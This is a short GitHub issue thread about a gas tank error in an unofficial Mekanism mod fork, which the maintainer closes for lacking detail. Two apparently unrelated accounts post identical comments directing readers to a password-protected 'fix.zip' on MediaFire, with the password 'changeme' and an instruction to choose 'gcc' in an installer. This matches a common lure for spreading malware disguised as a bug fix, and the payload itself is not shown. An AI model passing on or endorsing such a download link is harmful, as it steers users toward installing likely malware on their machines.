### ISSUE TITLE
gastank is bugged

### ISSUE THREAD

**Issue by x8vxv8x** [sddsd2332/Mekanism-CE-Unofficial-1.12.2#65]
![image](https://github.com/user-attachments/assets/f4199a78-ddd0-4306-846a-fc019b4610eb)
In the process of use, this error will continue to be generated

**Comment by projetosgppag** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by itbear-shu** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by sddsd2332** [comment]
Close this issue
This issue is not described in detail
